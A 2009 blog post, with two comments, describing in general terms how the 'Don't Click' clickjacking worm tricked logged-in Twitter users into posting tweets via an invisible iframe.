The “Don’t Click” TwitterBomb

Posted by Keeran on February 12, 2009 at 7:08 pm · Filed under general

So this Twitter bomb is spreading like wildfire – it works by overlaying the Twitter page in an invisible iframe (spotted by @peterc).

As most people stay logged in to Twitter, when they click the ‘Don’t click’ button (who can resist?!), it actually submits a tweet for you.

I’m not sure if this is exploiting any vulns at all. Some people are crying out ‘XSRF!!’ etc, but I’m not sure this is the case.

See attached screenies for firebug explanation :)

Twitbomb - before

Twitbomb - after

See Simon Willison’s presentation on web security for a more thorough explanation of click jacking and other exploits.

update: looks like Twitter have reacted

1 Comment »

  1. Clay Johnson said,

    February 12, 2009 @ 7:27 pm · Edit

    We did a little research over on Sunlight Labs as well on Don’t Click:

    http://bit.ly/kj1z9

  2. ruby on rails textmate said,

    July 18, 2010 @ 12:15 am · Edit

    ruby on rails textmate

    I thought it was going to be some boring old post, but it really compensated for my time. I will post a link to this page on my blog. I am sure my visitors will find that very useful.

RSS feed for comments on this post · TrackBack URI

Leave a Comment